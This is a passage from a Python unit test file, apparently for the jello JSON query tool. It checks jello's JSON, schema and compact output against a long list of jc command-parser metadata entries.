"lsblk"
]
},
{
"name": "lsmod",
"argument": "--lsmod",
"version": "1.1",
"description": "lsmod command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux"
],
"magic_commands": [
"lsmod"
]
},
{
"name": "lsof",
"argument": "--lsof",
"version": "1.0",
"description": "lsof command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux"
],
"magic_commands": [
"lsof"
]
},
{
"name": "mount",
"argument": "--mount",
"version": "1.1",
"description": "mount command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux",
"darwin"
],
"magic_commands": [
"mount"
]
},
{
"name": "netstat",
"argument": "--netstat",
"version": "1.2",
"description": "netstat command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux"
],
"magic_commands": [
"netstat"
]
},
{
"name": "ntpq",
"argument": "--ntpq",
"version": "1.0",
"description": "ntpq -p command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux"
],
"magic_commands": [
"ntpq"
]
},
{
"name": "passwd",
"argument": "--passwd",
"version": "1.0",
"description": "/etc/passwd file parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux",
"darwin",
"aix",
"freebsd"
]
},
{
"name": "pip_list",
"argument": "--pip-list",
"version": "1.0",
"description": "pip list command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux",
"darwin",
"cygwin",
"win32",
"aix",
"freebsd"
],
"magic_commands": [
"pip list",
"pip3 list"
]
},
{
"name": "pip_show",
"argument": "--pip-show",
"version": "1.0",
"description": "pip show command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux",
"darwin",
"cygwin",
"win32",
"aix",
"freebsd"
],
"magic_commands": [
"pip show",
"pip3 show"
]
},
{
"name": "ps",
"argument": "--ps",
"version": "1.1",
"description": "ps command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux",
"darwin",
"cygwin",
"aix",
"freebsd"
],
"magic_commands": [
"ps"
]
},
{
"name": "route",
"argument": "--route",
"version": "1.0",
"description": "route command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux"
],
"magic_commands": [
"route"
]
},
{
"name": "shadow",
"argument": "--shadow",
"version": "1.0",
"description": "/etc/shadow file parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux",
"darwin",
"aix",
"freebsd"
]
},
{
"name": "ss",
"argument": "--ss",
"version": "1.0",
"description": "ss command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux"
],
"magic_commands": [
"ss"
]
},
{
"name": "stat",
"argument": "--stat",
"version": "1.0",
"description": "stat command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux"
],
"magic_commands": [
"stat"
]
},
{
"name": "systemctl",
"argument": "--systemctl",
"version": "1.0",
"description": "systemctl command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux"
],
"magic_commands": [
"systemctl"
]
},
{
"name": "systemctl_lj",
"argument": "--systemctl-lj",
"version": "1.0",
"description": "systemctl list-jobs command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux"
],
"magic_commands": [
"systemctl list-jobs"
]
},
{
"name": "systemctl_ls",
"argument": "--systemctl-ls",
"version": "1.0",
"description": "systemctl list-sockets command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux"
],
"magic_commands": [
"systemctl list-sockets"
]
},
{
"name": "systemctl_luf",
"argument": "--systemctl-luf",
"version": "1.0",
"description": "systemctl list-unit-files command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux"
],
"magic_commands": [
"systemctl list-unit-files"
]
},
{
"name": "timedatectl",
"argument": "--timedatectl",
"version": "1.0",
"description": "timedatectl status command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux"
],
"magic_commands": [
"timedatectl",
"timedatectl status"
]
},
{
"name": "uname",
"argument": "--uname",
"version": "1.1",
"description": "uname -a command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux",
"darwin"
],
"magic_commands": [
"uname"
]
},
{
"name": "uptime",
"argument": "--uptime",
"version": "1.0",
"description": "uptime command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux",
"darwin",
"cygwin",
"aix",
"freebsd"
],
"magic_commands": [
"uptime"
]
},
{
"name": "w",
"argument": "--w",
"version": "1.0",
"description": "w command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux",
"darwin",
"cygwin",
"aix",
"freebsd"
],
"magic_commands": [
"w"
]
},
{
"name": "who",
"argument": "--who",
"version": "1.0",
"description": "who command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux",
"darwin",
"cygwin",
"aix",
"freebsd"
],
"magic_commands": [
"who"
]
},
{
"name": "xml",
"argument": "--xml",
"version": "1.0",
"description": "XML file parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"details": "Using the xmltodict library at https://github.com/martinblech/xmltodict",
"compatible": [
"linux",
"darwin",
"cygwin",
"win32",
"aix",
"freebsd"
]
},
{
"name": "yaml",
"argument": "--yaml",
"version": "1.0",
"description": "YAML file parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"details": "Using the ruamel.yaml library at https://pypi.org/project/ruamel.yaml",
"compatible": [
"linux",
"darwin",
"cygwin",
"win32",
"aix",
"freebsd"
]
}
]
'''
    # Capture stdout while invoking the jello CLI with a patched argv,
    # feeding it the sample `jc -a` output held in self.jc_a_output
    # (populated elsewhere in this test class).
    f = io.StringIO()
    with contextlib.redirect_stdout(f):
        testargs = ['jello', '_["parsers"]']
        with patch.object(sys, 'argv', testargs):
            _ = jello.cli.main(data=self.jc_a_output)
    # Captured stdout must match the expected JSON exactly.
    self.assertEqual(f.getvalue(), self.expected)
def test_jc_a_s_parsers_dot(self):
    """
    Test jc -a | jello -s '_.parsers'

    Runs the jello CLI with the -s (schema) option and the dot-notation
    query '_.parsers' against the stored sample `jc -a` output and checks
    the flat assignment-style schema lines written to stdout.
    """
    # Expected stdout: jello's -s (schema) view of the parsers array,
    # one flat `.path = value;` assignment per scalar. The comparison
    # below is an exact string match, including the trailing newline.
    self.expected = '''\
.[0].name = "airport";
.[0].argument = "--airport";
.[0].version = "1.0";
.[0].description = "airport -I command parser";
.[0].author = "Kelly Brazil";
.[0].author_email = "kellyjonbrazil@gmail.com";
.[0].compatible[0] = "darwin";
.[0].magic_commands[0] = "airport -I";
.[1].name = "airport_s";
.[1].argument = "--airport-s";
.[1].version = "1.0";
.[1].description = "airport -s command parser";
.[1].author = "Kelly Brazil";
.[1].author_email = "kellyjonbrazil@gmail.com";
.[1].compatible[0] = "darwin";
.[1].magic_commands[0] = "airport -s";
.[2].name = "arp";
.[2].argument = "--arp";
.[2].version = "1.2";
.[2].description = "arp command parser";
.[2].author = "Kelly Brazil";
.[2].author_email = "kellyjonbrazil@gmail.com";
.[2].compatible[0] = "linux";
.[2].compatible[1] = "aix";
.[2].compatible[2] = "freebsd";
.[2].compatible[3] = "darwin";
.[2].magic_commands[0] = "arp";
.[3].name = "blkid";
.[3].argument = "--blkid";
.[3].version = "1.0";
.[3].description = "blkid command parser";
.[3].author = "Kelly Brazil";
.[3].author_email = "kellyjonbrazil@gmail.com";
.[3].compatible[0] = "linux";
.[3].magic_commands[0] = "blkid";
.[4].name = "crontab";
.[4].argument = "--crontab";
.[4].version = "1.1";
.[4].description = "crontab command and file parser";
.[4].author = "Kelly Brazil";
.[4].author_email = "kellyjonbrazil@gmail.com";
.[4].compatible[0] = "linux";
.[4].compatible[1] = "darwin";
.[4].compatible[2] = "aix";
.[4].compatible[3] = "freebsd";
.[4].magic_commands[0] = "crontab";
.[5].name = "crontab_u";
.[5].argument = "--crontab-u";
.[5].version = "1.0";
.[5].description = "crontab file parser with user support";
.[5].author = "Kelly Brazil";
.[5].author_email = "kellyjonbrazil@gmail.com";
.[5].compatible[0] = "linux";
.[5].compatible[1] = "darwin";
.[5].compatible[2] = "aix";
.[5].compatible[3] = "freebsd";
.[6].name = "csv";
.[6].argument = "--csv";
.[6].version = "1.0";
.[6].description = "CSV file parser";
.[6].author = "Kelly Brazil";
.[6].author_email = "kellyjonbrazil@gmail.com";
.[6].details = "Using the python standard csv library";
.[6].compatible[0] = "linux";
.[6].compatible[1] = "darwin";
.[6].compatible[2] = "cygwin";
.[6].compatible[3] = "win32";
.[6].compatible[4] = "aix";
.[6].compatible[5] = "freebsd";
.[7].name = "df";
.[7].argument = "--df";
.[7].version = "1.1";
.[7].description = "df command parser";
.[7].author = "Kelly Brazil";
.[7].author_email = "kellyjonbrazil@gmail.com";
.[7].compatible[0] = "linux";
.[7].compatible[1] = "darwin";
.[7].magic_commands[0] = "df";
.[8].name = "dig";
.[8].argument = "--dig";
.[8].version = "1.1";
.[8].description = "dig command parser";
.[8].author = "Kelly Brazil";
.[8].author_email = "kellyjonbrazil@gmail.com";
.[8].compatible[0] = "linux";
.[8].compatible[1] = "aix";
.[8].compatible[2] = "freebsd";
.[8].compatible[3] = "darwin";
.[8].magic_commands[0] = "dig";
.[9].name = "du";
.[9].argument = "--du";
.[9].version = "1.1";
.[9].description = "du command parser";
.[9].author = "Kelly Brazil";
.[9].author_email = "kellyjonbrazil@gmail.com";
.[9].compatible[0] = "linux";
.[9].compatible[1] = "darwin";
.[9].compatible[2] = "aix";
.[9].compatible[3] = "freebsd";
.[9].magic_commands[0] = "du";
.[10].name = "env";
.[10].argument = "--env";
.[10].version = "1.1";
.[10].description = "env command parser";
.[10].author = "Kelly Brazil";
.[10].author_email = "kellyjonbrazil@gmail.com";
.[10].compatible[0] = "linux";
.[10].compatible[1] = "darwin";
.[10].compatible[2] = "cygwin";
.[10].compatible[3] = "win32";
.[10].compatible[4] = "aix";
.[10].compatible[5] = "freebsd";
.[10].magic_commands[0] = "env";
.[11].name = "file";
.[11].argument = "--file";
.[11].version = "1.1";
.[11].description = "file command parser";
.[11].author = "Kelly Brazil";
.[11].author_email = "kellyjonbrazil@gmail.com";
.[11].compatible[0] = "linux";
.[11].compatible[1] = "aix";
.[11].compatible[2] = "freebsd";
.[11].compatible[3] = "darwin";
.[11].magic_commands[0] = "file";
.[12].name = "free";
.[12].argument = "--free";
.[12].version = "1.0";
.[12].description = "free command parser";
.[12].author = "Kelly Brazil";
.[12].author_email = "kellyjonbrazil@gmail.com";
.[12].compatible[0] = "linux";
.[12].magic_commands[0] = "free";
.[13].name = "fstab";
.[13].argument = "--fstab";
.[13].version = "1.0";
.[13].description = "fstab file parser";
.[13].author = "Kelly Brazil";
.[13].author_email = "kellyjonbrazil@gmail.com";
.[13].compatible[0] = "linux";
.[14].name = "group";
.[14].argument = "--group";
.[14].version = "1.0";
.[14].description = "/etc/group file parser";
.[14].author = "Kelly Brazil";
.[14].author_email = "kellyjonbrazil@gmail.com";
.[14].compatible[0] = "linux";
.[14].compatible[1] = "darwin";
.[14].compatible[2] = "aix";
.[14].compatible[3] = "freebsd";
.[15].name = "gshadow";
.[15].argument = "--gshadow";
.[15].version = "1.0";
.[15].description = "/etc/gshadow file parser";
.[15].author = "Kelly Brazil";
.[15].author_email = "kellyjonbrazil@gmail.com";
.[15].compatible[0] = "linux";
.[15].compatible[1] = "aix";
.[15].compatible[2] = "freebsd";
.[16].name = "history";
.[16].argument = "--history";
.[16].version = "1.2";
.[16].description = "history command parser";
.[16].author = "Kelly Brazil";
.[16].author_email = "kellyjonbrazil@gmail.com";
.[16].details = "Optimizations by https://github.com/philippeitis";
.[16].compatible[0] = "linux";
.[16].compatible[1] = "darwin";
.[16].compatible[2] = "cygwin";
.[16].compatible[3] = "aix";
.[16].compatible[4] = "freebsd";
.[17].name = "hosts";
.[17].argument = "--hosts";
.[17].version = "1.0";
.[17].description = "/etc/hosts file parser";
.[17].author = "Kelly Brazil";
.[17].author_email = "kellyjonbrazil@gmail.com";
.[17].compatible[0] = "linux";
.[17].compatible[1] = "darwin";
.[17].compatible[2] = "cygwin";
.[17].compatible[3] = "win32";
.[17].compatible[4] = "aix";
.[17].compatible[5] = "freebsd";
.[18].name = "id";
.[18].argument = "--id";
.[18].version = "1.0";
.[18].description = "id command parser";
.[18].author = "Kelly Brazil";
.[18].author_email = "kellyjonbrazil@gmail.com";
.[18].compatible[0] = "linux";
.[18].compatible[1] = "darwin";
.[18].compatible[2] = "aix";
.[18].compatible[3] = "freebsd";
.[18].magic_commands[0] = "id";
.[19].name = "ifconfig";
.[19].argument = "--ifconfig";
.[19].version = "1.5";
.[19].description = "ifconfig command parser";
.[19].author = "Kelly Brazil";
.[19].author_email = "kellyjonbrazil@gmail.com";
.[19].details = "Using ifconfig-parser package from https://github.com/KnightWhoSayNi/ifconfig-parser";
.[19].compatible[0] = "linux";
.[19].compatible[1] = "aix";
.[19].compatible[2] = "freebsd";
.[19].compatible[3] = "darwin";
.[19].magic_commands[0] = "ifconfig";
.[20].name = "ini";
.[20].argument = "--ini";
.[20].version = "1.0";
.[20].description = "INI file parser";
.[20].author = "Kelly Brazil";
.[20].author_email = "kellyjonbrazil@gmail.com";
.[20].details = "Using configparser from the standard library";
.[20].compatible[0] = "linux";
.[20].compatible[1] = "darwin";
.[20].compatible[2] = "cygwin";
.[20].compatible[3] = "win32";
.[20].compatible[4] = "aix";
.[20].compatible[5] = "freebsd";
.[21].name = "iptables";
.[21].argument = "--iptables";
.[21].version = "1.1";
.[21].description = "iptables command parser";
.[21].author = "Kelly Brazil";
.[21].author_email = "kellyjonbrazil@gmail.com";
.[21].compatible[0] = "linux";
.[21].magic_commands[0] = "iptables";
.[22].name = "jobs";
.[22].argument = "--jobs";
.[22].version = "1.0";
.[22].description = "jobs command parser";
.[22].author = "Kelly Brazil";
.[22].author_email = "kellyjonbrazil@gmail.com";
.[22].compatible[0] = "linux";
.[22].compatible[1] = "darwin";
.[22].compatible[2] = "cygwin";
.[22].compatible[3] = "aix";
.[22].compatible[4] = "freebsd";
.[22].magic_commands[0] = "jobs";
.[23].name = "last";
.[23].argument = "--last";
.[23].version = "1.0";
.[23].description = "last and lastb command parser";
.[23].author = "Kelly Brazil";
.[23].author_email = "kellyjonbrazil@gmail.com";
.[23].compatible[0] = "linux";
.[23].compatible[1] = "darwin";
.[23].compatible[2] = "aix";
.[23].compatible[3] = "freebsd";
.[23].magic_commands[0] = "last";
.[23].magic_commands[1] = "lastb";
.[24].name = "ls";
.[24].argument = "--ls";
.[24].version = "1.3";
.[24].description = "ls command parser";
.[24].author = "Kelly Brazil";
.[24].author_email = "kellyjonbrazil@gmail.com";
.[24].compatible[0] = "linux";
.[24].compatible[1] = "darwin";
.[24].compatible[2] = "cygwin";
.[24].compatible[3] = "aix";
.[24].compatible[4] = "freebsd";
.[24].magic_commands[0] = "ls";
.[25].name = "lsblk";
.[25].argument = "--lsblk";
.[25].version = "1.3";
.[25].description = "lsblk command parser";
.[25].author = "Kelly Brazil";
.[25].author_email = "kellyjonbrazil@gmail.com";
.[25].compatible[0] = "linux";
.[25].magic_commands[0] = "lsblk";
.[26].name = "lsmod";
.[26].argument = "--lsmod";
.[26].version = "1.1";
.[26].description = "lsmod command parser";
.[26].author = "Kelly Brazil";
.[26].author_email = "kellyjonbrazil@gmail.com";
.[26].compatible[0] = "linux";
.[26].magic_commands[0] = "lsmod";
.[27].name = "lsof";
.[27].argument = "--lsof";
.[27].version = "1.0";
.[27].description = "lsof command parser";
.[27].author = "Kelly Brazil";
.[27].author_email = "kellyjonbrazil@gmail.com";
.[27].compatible[0] = "linux";
.[27].magic_commands[0] = "lsof";
.[28].name = "mount";
.[28].argument = "--mount";
.[28].version = "1.1";
.[28].description = "mount command parser";
.[28].author = "Kelly Brazil";
.[28].author_email = "kellyjonbrazil@gmail.com";
.[28].compatible[0] = "linux";
.[28].compatible[1] = "darwin";
.[28].magic_commands[0] = "mount";
.[29].name = "netstat";
.[29].argument = "--netstat";
.[29].version = "1.2";
.[29].description = "netstat command parser";
.[29].author = "Kelly Brazil";
.[29].author_email = "kellyjonbrazil@gmail.com";
.[29].compatible[0] = "linux";
.[29].magic_commands[0] = "netstat";
.[30].name = "ntpq";
.[30].argument = "--ntpq";
.[30].version = "1.0";
.[30].description = "ntpq -p command parser";
.[30].author = "Kelly Brazil";
.[30].author_email = "kellyjonbrazil@gmail.com";
.[30].compatible[0] = "linux";
.[30].magic_commands[0] = "ntpq";
.[31].name = "passwd";
.[31].argument = "--passwd";
.[31].version = "1.0";
.[31].description = "/etc/passwd file parser";
.[31].author = "Kelly Brazil";
.[31].author_email = "kellyjonbrazil@gmail.com";
.[31].compatible[0] = "linux";
.[31].compatible[1] = "darwin";
.[31].compatible[2] = "aix";
.[31].compatible[3] = "freebsd";
.[32].name = "pip_list";
.[32].argument = "--pip-list";
.[32].version = "1.0";
.[32].description = "pip list command parser";
.[32].author = "Kelly Brazil";
.[32].author_email = "kellyjonbrazil@gmail.com";
.[32].compatible[0] = "linux";
.[32].compatible[1] = "darwin";
.[32].compatible[2] = "cygwin";
.[32].compatible[3] = "win32";
.[32].compatible[4] = "aix";
.[32].compatible[5] = "freebsd";
.[32].magic_commands[0] = "pip list";
.[32].magic_commands[1] = "pip3 list";
.[33].name = "pip_show";
.[33].argument = "--pip-show";
.[33].version = "1.0";
.[33].description = "pip show command parser";
.[33].author = "Kelly Brazil";
.[33].author_email = "kellyjonbrazil@gmail.com";
.[33].compatible[0] = "linux";
.[33].compatible[1] = "darwin";
.[33].compatible[2] = "cygwin";
.[33].compatible[3] = "win32";
.[33].compatible[4] = "aix";
.[33].compatible[5] = "freebsd";
.[33].magic_commands[0] = "pip show";
.[33].magic_commands[1] = "pip3 show";
.[34].name = "ps";
.[34].argument = "--ps";
.[34].version = "1.1";
.[34].description = "ps command parser";
.[34].author = "Kelly Brazil";
.[34].author_email = "kellyjonbrazil@gmail.com";
.[34].compatible[0] = "linux";
.[34].compatible[1] = "darwin";
.[34].compatible[2] = "cygwin";
.[34].compatible[3] = "aix";
.[34].compatible[4] = "freebsd";
.[34].magic_commands[0] = "ps";
.[35].name = "route";
.[35].argument = "--route";
.[35].version = "1.0";
.[35].description = "route command parser";
.[35].author = "Kelly Brazil";
.[35].author_email = "kellyjonbrazil@gmail.com";
.[35].compatible[0] = "linux";
.[35].magic_commands[0] = "route";
.[36].name = "shadow";
.[36].argument = "--shadow";
.[36].version = "1.0";
.[36].description = "/etc/shadow file parser";
.[36].author = "Kelly Brazil";
.[36].author_email = "kellyjonbrazil@gmail.com";
.[36].compatible[0] = "linux";
.[36].compatible[1] = "darwin";
.[36].compatible[2] = "aix";
.[36].compatible[3] = "freebsd";
.[37].name = "ss";
.[37].argument = "--ss";
.[37].version = "1.0";
.[37].description = "ss command parser";
.[37].author = "Kelly Brazil";
.[37].author_email = "kellyjonbrazil@gmail.com";
.[37].compatible[0] = "linux";
.[37].magic_commands[0] = "ss";
.[38].name = "stat";
.[38].argument = "--stat";
.[38].version = "1.0";
.[38].description = "stat command parser";
.[38].author = "Kelly Brazil";
.[38].author_email = "kellyjonbrazil@gmail.com";
.[38].compatible[0] = "linux";
.[38].magic_commands[0] = "stat";
.[39].name = "systemctl";
.[39].argument = "--systemctl";
.[39].version = "1.0";
.[39].description = "systemctl command parser";
.[39].author = "Kelly Brazil";
.[39].author_email = "kellyjonbrazil@gmail.com";
.[39].compatible[0] = "linux";
.[39].magic_commands[0] = "systemctl";
.[40].name = "systemctl_lj";
.[40].argument = "--systemctl-lj";
.[40].version = "1.0";
.[40].description = "systemctl list-jobs command parser";
.[40].author = "Kelly Brazil";
.[40].author_email = "kellyjonbrazil@gmail.com";
.[40].compatible[0] = "linux";
.[40].magic_commands[0] = "systemctl list-jobs";
.[41].name = "systemctl_ls";
.[41].argument = "--systemctl-ls";
.[41].version = "1.0";
.[41].description = "systemctl list-sockets command parser";
.[41].author = "Kelly Brazil";
.[41].author_email = "kellyjonbrazil@gmail.com";
.[41].compatible[0] = "linux";
.[41].magic_commands[0] = "systemctl list-sockets";
.[42].name = "systemctl_luf";
.[42].argument = "--systemctl-luf";
.[42].version = "1.0";
.[42].description = "systemctl list-unit-files command parser";
.[42].author = "Kelly Brazil";
.[42].author_email = "kellyjonbrazil@gmail.com";
.[42].compatible[0] = "linux";
.[42].magic_commands[0] = "systemctl list-unit-files";
.[43].name = "timedatectl";
.[43].argument = "--timedatectl";
.[43].version = "1.0";
.[43].description = "timedatectl status command parser";
.[43].author = "Kelly Brazil";
.[43].author_email = "kellyjonbrazil@gmail.com";
.[43].compatible[0] = "linux";
.[43].magic_commands[0] = "timedatectl";
.[43].magic_commands[1] = "timedatectl status";
.[44].name = "uname";
.[44].argument = "--uname";
.[44].version = "1.1";
.[44].description = "uname -a command parser";
.[44].author = "Kelly Brazil";
.[44].author_email = "kellyjonbrazil@gmail.com";
.[44].compatible[0] = "linux";
.[44].compatible[1] = "darwin";
.[44].magic_commands[0] = "uname";
.[45].name = "uptime";
.[45].argument = "--uptime";
.[45].version = "1.0";
.[45].description = "uptime command parser";
.[45].author = "Kelly Brazil";
.[45].author_email = "kellyjonbrazil@gmail.com";
.[45].compatible[0] = "linux";
.[45].compatible[1] = "darwin";
.[45].compatible[2] = "cygwin";
.[45].compatible[3] = "aix";
.[45].compatible[4] = "freebsd";
.[45].magic_commands[0] = "uptime";
.[46].name = "w";
.[46].argument = "--w";
.[46].version = "1.0";
.[46].description = "w command parser";
.[46].author = "Kelly Brazil";
.[46].author_email = "kellyjonbrazil@gmail.com";
.[46].compatible[0] = "linux";
.[46].compatible[1] = "darwin";
.[46].compatible[2] = "cygwin";
.[46].compatible[3] = "aix";
.[46].compatible[4] = "freebsd";
.[46].magic_commands[0] = "w";
.[47].name = "who";
.[47].argument = "--who";
.[47].version = "1.0";
.[47].description = "who command parser";
.[47].author = "Kelly Brazil";
.[47].author_email = "kellyjonbrazil@gmail.com";
.[47].compatible[0] = "linux";
.[47].compatible[1] = "darwin";
.[47].compatible[2] = "cygwin";
.[47].compatible[3] = "aix";
.[47].compatible[4] = "freebsd";
.[47].magic_commands[0] = "who";
.[48].name = "xml";
.[48].argument = "--xml";
.[48].version = "1.0";
.[48].description = "XML file parser";
.[48].author = "Kelly Brazil";
.[48].author_email = "kellyjonbrazil@gmail.com";
.[48].details = "Using the xmltodict library at https://github.com/martinblech/xmltodict";
.[48].compatible[0] = "linux";
.[48].compatible[1] = "darwin";
.[48].compatible[2] = "cygwin";
.[48].compatible[3] = "win32";
.[48].compatible[4] = "aix";
.[48].compatible[5] = "freebsd";
.[49].name = "yaml";
.[49].argument = "--yaml";
.[49].version = "1.0";
.[49].description = "YAML file parser";
.[49].author = "Kelly Brazil";
.[49].author_email = "kellyjonbrazil@gmail.com";
.[49].details = "Using the ruamel.yaml library at https://pypi.org/project/ruamel.yaml";
.[49].compatible[0] = "linux";
.[49].compatible[1] = "darwin";
.[49].compatible[2] = "cygwin";
.[49].compatible[3] = "win32";
.[49].compatible[4] = "aix";
.[49].compatible[5] = "freebsd";
'''
    # Capture stdout while invoking the jello CLI with a patched argv,
    # feeding it the sample `jc -a` output held in self.jc_a_output
    # (populated elsewhere in this test class).
    f = io.StringIO()
    with contextlib.redirect_stdout(f):
        testargs = ['jello', '-s', '_.parsers']
        with patch.object(sys, 'argv', testargs):
            _ = jello.cli.main(data=self.jc_a_output)
    # Captured stdout must match the expected schema output exactly.
    self.assertEqual(f.getvalue(), self.expected)
def test_jc_a_c_parsers(self):
    """
    Test jc -a | jello -c '_["parsers"]'
    """
    # Exact compact (-c) JSON text that jello must print for the parsers list.
    self.expected = '''[{"name":"airport","argument":"--airport","version":"1.0","description":"airport -I command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["darwin"],"magic_commands":["airport -I"]},{"name":"airport_s","argument":"--airport-s","version":"1.0","description":"airport -s command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["darwin"],"magic_commands":["airport -s"]},{"name":"arp","argument":"--arp","version":"1.2","description":"arp command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","aix","freebsd","darwin"],"magic_commands":["arp"]},{"name":"blkid","argument":"--blkid","version":"1.0","description":"blkid command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["blkid"]},{"name":"crontab","argument":"--crontab","version":"1.1","description":"crontab command and file parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","aix","freebsd"],"magic_commands":["crontab"]},{"name":"crontab_u","argument":"--crontab-u","version":"1.0","description":"crontab file parser with user support","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","aix","freebsd"]},{"name":"csv","argument":"--csv","version":"1.0","description":"CSV file parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","details":"Using the python standard csv library","compatible":["linux","darwin","cygwin","win32","aix","freebsd"]},{"name":"df","argument":"--df","version":"1.1","description":"df command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin"],"magic_commands":["df"]},{"name":"dig","argument":"--dig","version":"1.1","description":"dig command parser","author":"Kelly 
Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","aix","freebsd","darwin"],"magic_commands":["dig"]},{"name":"du","argument":"--du","version":"1.1","description":"du command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","aix","freebsd"],"magic_commands":["du"]},{"name":"env","argument":"--env","version":"1.1","description":"env command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","cygwin","win32","aix","freebsd"],"magic_commands":["env"]},{"name":"file","argument":"--file","version":"1.1","description":"file command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","aix","freebsd","darwin"],"magic_commands":["file"]},{"name":"free","argument":"--free","version":"1.0","description":"free command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["free"]},{"name":"fstab","argument":"--fstab","version":"1.0","description":"fstab file parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"]},{"name":"group","argument":"--group","version":"1.0","description":"/etc/group file parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","aix","freebsd"]},{"name":"gshadow","argument":"--gshadow","version":"1.0","description":"/etc/gshadow file parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","aix","freebsd"]},{"name":"history","argument":"--history","version":"1.2","description":"history command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","details":"Optimizations by https://github.com/philippeitis","compatible":["linux","darwin","cygwin","aix","freebsd"]},{"name":"hosts","argument":"--hosts","version":"1.0","description":"/etc/hosts file parser","author":"Kelly 
Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","cygwin","win32","aix","freebsd"]},{"name":"id","argument":"--id","version":"1.0","description":"id command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","aix","freebsd"],"magic_commands":["id"]},{"name":"ifconfig","argument":"--ifconfig","version":"1.5","description":"ifconfig command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","details":"Using ifconfig-parser package from https://github.com/KnightWhoSayNi/ifconfig-parser","compatible":["linux","aix","freebsd","darwin"],"magic_commands":["ifconfig"]},{"name":"ini","argument":"--ini","version":"1.0","description":"INI file parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","details":"Using configparser from the standard library","compatible":["linux","darwin","cygwin","win32","aix","freebsd"]},{"name":"iptables","argument":"--iptables","version":"1.1","description":"iptables command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["iptables"]},{"name":"jobs","argument":"--jobs","version":"1.0","description":"jobs command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","cygwin","aix","freebsd"],"magic_commands":["jobs"]},{"name":"last","argument":"--last","version":"1.0","description":"last and lastb command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","aix","freebsd"],"magic_commands":["last","lastb"]},{"name":"ls","argument":"--ls","version":"1.3","description":"ls command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","cygwin","aix","freebsd"],"magic_commands":["ls"]},{"name":"lsblk","argument":"--lsblk","version":"1.3","description":"lsblk command parser","author":"Kelly 
